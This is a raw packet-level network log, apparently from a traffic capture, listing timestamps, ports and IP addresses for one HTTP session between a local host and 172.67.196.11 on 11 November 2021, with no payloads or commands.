Nov 11, 2021 20:35:49.125787020 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125803947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125832081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125849009 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125866890 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125884056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125896931 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125911951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125912905 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125932932 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125952005 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.125957966 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.125983953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126000881 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126000881 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126023054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126043081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126064062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126081944 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126101017 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126108885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126123905 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126131058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126148939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126178980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126197100 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126219988 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126223087 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126230955 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126241922 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126264095 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126280069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126307011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126312971 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126321077 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126331091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126348972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126374960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126390934 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126399040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126429081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126447916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126465082 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126472950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126491070 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126517057 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126533985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126559019 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126563072 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126568079 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126578093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126600981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126616955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126643896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126647949 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126653910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126661062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126686096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126703024 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126729012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126744986 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126770973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126775980 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126780987 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126792908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126808882 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126835108 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126851082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126877069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126899004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126924992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126941919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126966953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.126971006 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126977921 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.126983881 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127007961 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127023935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127049923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127064943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127094030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127110958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127137899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127140999 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127146959 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127156973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127175093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127199888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127218962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127244949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127263069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127289057 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127305031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127331018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127336025 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127342939 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127350092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127372026 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127389908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127415895 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127430916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127458096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127475023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127501011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127505064 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127511024 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127521992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127548933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127566099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127593040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127609968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127612114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127630949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127650023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127671003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127687931 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127713919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127718925 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127724886 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127729893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127756119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127774000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127795935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127813101 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127821922 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127832890 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127855062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127871990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127892971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127909899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127918005 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.127929926 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127948999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127969980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127986908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.127990961 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128009081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128026009 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128047943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128070116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128096104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128112078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128130913 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128138065 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128138065 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128154993 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128176928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128196955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128216028 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128217936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128237963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128261089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128281116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128302097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128319025 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128345013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128361940 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128386974 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128392935 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128398895 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128405094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128427982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128444910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128468990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128485918 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128498077 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128509045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128515005 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128525019 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128551960 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128570080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128597021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128601074 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128606081 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128614902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128645897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128663063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128689051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128705978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128732920 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128739119 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128751040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128777981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128793955 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128820896 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128823042 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128839016 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128875017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128891945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128917933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128925085 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128941059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128942013 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.128957987 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128979921 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.128998041 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129000902 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129019976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129035950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129057884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129076958 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129079103 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129097939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129113913 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129134893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129139900 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129158020 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129180908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129198074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129228115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129245043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129257917 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129271030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129288912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129311085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129328012 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129354000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129373074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129385948 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129390955 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129398108 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129417896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129446030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129462957 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129488945 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129508018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129534006 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129539967 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129550934 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129573107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129590034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129626036 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129642963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129672050 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129677057 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129683018 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129690886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129719973 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129738092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129765987 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129782915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129832983 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129834890 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129856110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129878998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129906893 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129923105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129950047 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129955053 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.129967928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.129971981 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130007029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130014896 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130024910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130045891 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130062103 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130088091 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130105972 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130109072 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130127907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130146980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130168915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130172014 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130186081 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130207062 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130223989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130228996 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130248070 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130268097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130290031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130306959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130311966 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130328894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130347967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130369902 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130386114 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130398035 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130408049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130424976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130446911 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130462885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130489111 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130506039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130531073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130536079 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130543947 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.130548000 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130573034 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.130780935 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.132575989 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147342920 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147362947 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147394896 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147413015 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147442102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147459030 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147486925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147505045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147531986 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147594929 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147608995 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147625923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147650003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147670984 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147671938 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147692919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147716045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147735119 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147741079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147763968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147775888 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147787094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147810936 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147830963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147855997 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147876978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147901058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147921085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147938013 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147943974 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.147944927 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147969007 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.147985935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148014069 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148027897 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148035049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148060083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148077011 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148103952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148107052 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148113012 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148123980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148143053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148170948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148190975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148210049 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148227930 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148256063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.148260117 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.148266077 CET	49751	80	192.168.2.3	172.67.196.11
